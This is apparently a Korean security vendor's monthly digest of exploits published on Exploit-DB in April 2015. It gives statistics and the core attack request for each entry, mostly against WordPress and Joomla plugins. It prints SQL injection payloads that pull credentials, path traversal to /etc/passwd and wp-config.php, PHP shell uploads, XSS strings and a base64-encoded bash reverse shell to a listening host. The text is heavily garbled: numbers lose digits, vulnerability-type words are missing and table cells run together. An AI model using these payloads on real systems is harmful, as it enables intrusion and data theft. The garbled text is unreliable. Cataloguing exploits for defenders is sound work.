36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는 뿐만아니라 Cross Site Scripting(XSS) 과 File Upload 와같은다양한역시다수발견되었으며, 4 월가장많은이보고된소프트웨어로확인되었습니다. 의은대부분 에서발생되므로 를사용하는관리자는주기적으로진단또는 업데이트를실시하여보안성을유지해야합니다. 또한 소프트웨어에서 2 개의이발견되었습니다. 해당은소스코드에의한이며, 단순한공격패턴만으로악용가능합니다. 난이도가낮은반면매우큰피해를줄수있기때문에각별히주의할필요가있습니다.. 별보고개수 보고개수 Command File Upload 3 XSS 4 LFI 6 9 총합계 33 35 30 25 20 5 0 5 0 Command 33 별보고개수 9 6 3 4 File Upload XSS LFI 총합계 2. 위험도별분류위험도 보고개수 백분율 6 48.48% 중 7 5.52% 위험도별분류 하 0 0.00% 합계 33 00.00% 7 6 중 3. 공격난이도별현황공격난이도 보고개수 백분율 6 8.8% 중 9 27.27% 하 8 54.55% 총합계 33 00.00% 공격난이도별현황 6 8 9 중 하 4. 주요소프트웨어별발생현황소프트웨어이름 Ericsson phpsfp Balero BlueDragon CFChart Servlet Wolf 총합계 보고개수 2 2 2 33 주요소프트웨어별발생현황 6% 6% 64% Ericsson phpsfp Balero ** 5개이발생한주요소프트웨어별세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3664 File Upload 하 Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload 3663 하 중 Simple Ads Manager - sam-ajax.php 3663 하 중 Simple Ads Manager - /sam-ajax-admin.php 36600 Business Intelligence - view.php 36677 중 Traffic Analyzer 3.4.2 - / 3667 중 All In One WP Security & Firewall 3.9.0 - admin.php 3669 File Upload 하 Windows Desktop and iphone Photo Uploader - upload.php File Upload 36735 중 Duplicator <= 0.5.4 - admin-ajax.php 36733 LFI 하 중 'WP Mobile Edition' 2.7 - css.php LFI 36762 XSS 하 중 MiwoFTP.0.5 - admin.php XSS 3675 하 중 Video Gallery 2.8 - admin-ajax.php 3676 LFI 하 중 MiwoFTP.0.5 - admin.php LFI 36777 중 중 Ajax Store Locator.2 - admin-ajax.php 36805 하 중 Community Events.3.5 - /

36802 Tune Library.5.4 - / 36800 중 NEX-Forms < 3.0 - admin-ajax.php 36824 하 중 Ultimate Product Catalogue - / 36823 하 중 Ultimate Product Catalogue - admin-ajax.php 36860 LFI 하 TheCartPress.3.9 - admin.php LFI 36860 XSS 하 중 TheCartPress.3.9 - /shopping-cart/checkout/ XSS 36860 XSS 하 중 TheCartPress.3.9 - admin.php XSS

날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-02 3669 LFI 중 205-04-02 3666 EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Ericsson Drutt MSDP (Instance Monitor) - / LFI phpsfp Schedule Facebook Posts.5.6 - /index.php/login /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd GET /index.php/login HTTP/. Cookie: login= ' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit ))) or ' 2 Ericsson phpsfp Ericsson Drutt MSDP (Instance Monitor) phpsfp - Schedule Facebook Posts.5.6 205-04-02 3664 File Upload 하 Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload POST /wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 plugin Simple Ads Manager 2.5.94 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-02 3663 하중 Simple Ads Manager - sam-ajax.php POST /wp-content/plugins/simple-ads-manager/samajax.php HTTP/. plugin Simple Ads Manager 2.5.94 and 2.5.96 action=sam_hits&hits%5b0%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&hits%5b2%5d%5b%5d= and =&level=3 205-04-02 3663 하중 Simple Ads Manager - /sam-ajax-admin.php POST/wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. plugin Simple Ads Manager 2.5.94 and 2.5.96 action=load_posts&cstr= and =&sp=post&spg=page 205-04-02 3660 Spider Random Article Componen - index.php /index.php?option=com_rand&catid=%27%20and(selec t%20%20from(select%20count(*),concat((select%20( select%20concat(database(),0x27,0x7e))%20from%20i nformation_schema.tables%20limit%200,),floor(rand(0 )*2))x%20FROM%20information_schema.tables%20GR OUP%20BY%20x)a)--%20- &limit=&style=&view=articles&format=raw&itemid=3 Spider Random Article Component 205-04-02 36600 205-04-05 3664 Business Intelligence - view.php - adsearch.php /wp-content/plugins/wp-business-intelligence/view.php?t=337+union+select+,2,3,group_concat(table_name), 5,6,7,8,9,0,+from+information_schema.tables+where +table_schema=database()--%20 /adsearch.php=action=search&buyitnow=y&buyitnowonly =y&category=%20and%20= Business Intelligence 205-04-08 36678 LFI 하 Configuration Management.3. - /zenworks/uploadservlet LFI POST /zenworks/uploadservlet?uid=../../../opt/novell/zenworks/ share/tomcat/webapps/&filename=payload.war HTTP/. Configuration Management.3. 205-04-08 36677 중 Traffic Analyzer 3.4.2 - / GET / HTTP/. x.x.x.x Referer: BLAH' (SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) ) ' Traffic Analyzer 3.4.2 205-04-08 36675 중중 Balero CMS 0.7.2 - /balerocms/admin/edit_page/m od-virtual_page/id- POST /balerocms/admin/edit_page/mod-virtual_page/id- HTTP/. Balero Balero CMS 0.7.2 id=' and benchmark (50000000,sha())--

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-08 36674 XSS 중중 7.6.0.3 - adminajax.php XSS POST/wordpress-install/wp-admin/admin-ajax.php HTTP/. 7.6.0.3 location[id]='><script>alert(string.fromcharcode(88,83,83 ));</script> 205-04-08 3667 중 All In One WP Security & Firewall 3.9.0 - admin.php /wpadmin/admin.php?page=aiowpsec&tab=tab3&orderby=us er_id,(select * from (select(sleep(30)))a)&order=asc All In One WP Security & Firewall 3.9.0 205-04-09 3669 File Upload 하 Windows Desktop and iphone Photo Uploader - upload.php File Upload POST /wordpress/wp-content/plugins/i-dump-iphone-towordpress-photo-uploader/uploader.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream Windows Desktop and iphone Photo Uploader <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-3 36735 중 Duplicator <= 0.5.4 - admin-ajax.php POST /wp-admin/adminajax.php?action=duplicator_package_delete HTTP/. Duplicator <= 0.5.4 duplicator_delid= and (select * from (select(sleep(20)))a) 205-04-3 36733 LFI 하중 'WP Mobile Edition' 2.7 - css.php LFI /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php 'WP Mobile Edition' 2.7 205-04-4 36762 XSS 하중 MiwoFTP.0.5 - admin.php XSS /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wpcontent"><script>alert()</script>&order=name&srt=yes MiwoFTP.0.5 205-04-4 3675 하중 Video Gallery 2.8 - /wp-admin/admin- admin-ajax.php 취 ajax.php?action=googleadsense&vid=%20and%20=-- 약점 Video Gallery 2.8 205-04-4 3676 LFI 하중 MiwoFTP.0.5 - admin.php LFI POST /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/. MiwoFTP.0.5 do_action=delete&first=y&selitems[]=../../../../../pls_mr_jai ler_dont_deleteme.txt 205-04-6 36777 중중 Ajax Store Locator.2 - admin-ajax.php /wordpress/wp-admin/adminajax.php?action=sl_dal_searchlocation&funmethod=searc hstore&location=social&storelocation=~ AND (SELECT * FROM (SELECT(SLEEP(0)))LCKZ) Ajax Store Locator.2 205-04-2 3685 LFI 하중 BlueDragon CFChart Servlet 7...7759 - /cfchart.cfchart LFI /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp BlueDragon CFChart Servlet BlueDragon CFChart Servlet 7...7759 205-04-2 36805 하 중 205-04-2 36802 205-04-2 36800 중 Community Events.3.5 - / Tune Library.5.4 - / /?page_id=2&eventyear=205 AND = )-- &dateset=on&eventday= /?page_id=2&artistletter=g' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database( )),2--%20 NEX-Forms < 3.0 - /wordpress/wp-admin/adminajax.php?action=submit_nex_form&nex_forms_id=0 admin-ajax.php AND (SELECT * FROM (SELECT(SLEEP(0)))NdbE) Community Events.3.5 Tune Library.5.4 NEX-Forms < 3.0

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-2 36807 하중 3.3-406088000 - /go_login/validate_credentials/admin/%27%20or%20% /go_login/validate_credentials/a 27%27%3D%27 dmin/ 3.3-406088000 205-04-2 36807 Command 3.3-406088000 - /index.php/go_site/cpanel/ Command /index.php/go_site/cpanel/ bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvND Q0NCAwPiYx base64 --decode\`" 3.3-406088000 205-04-22 3688 File Upload 하중 Wolf CMS 0.8.2 - /admin/login/login File Upload POST /admin/login/login HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 Wolf Wolf CMS 0.8.2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-23 36824 하 중 205-04-23 36823 하 중 Ultimate Product Catalogue - / Ultimate Product Catalogue - adminajax.php /?SingleProduct=2'+and+'a'='a POST /wp-admin/admin-ajax.php HTTP/. Ultimate Product Catalogue Ultimate Product Catalogue Item_ID=2 AND SLEEP(5)&action=record_view 205-04-29 36862 중 OS Solution OSProperty 2.8.0 - index.php /index.php?option=com_osproperty&no_html=&tmpl=co mponent&task=ajax_loadstateinlistpage&country_id=3' UNION ALL SELECT NULL,CONCAT(0x76a6277,0x797774584a4b495474 d,0x7627707)# OS Solution OSProperty 2.8.0 205-04-29 36860 LFI 하 TheCartPress.3.9 - admin.php LFI POST /wpadmin/admin.php?page=checkout_editor_settings HTTP/. TheCartPress.3.9 tcp_save_fields=&tcp_box_path=../../../../../etc/passwd 205-04-29 36860 XSS 하중 TheCartPress.3.9 - /shoppingcart/checkout/ XSS POST /shopping-cart/checkout/ HTTP/. TheCartPress.3.9 selected_billing_id=&selected_billing_address=new&billin g_firstname="><script>alert(/immuniweb/);</script>

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-29 36860 XSS 하중 TheCartPress.3.9 - admin.php XSS /wpadmin/admin.php?page=thecartpress/admin/addresseslist.php&search_by=-- %3E%%27%22%3E%3Cscript%3Ealert%28%27immu niweb%27%29;%3c/script%3e TheCartPress.3.9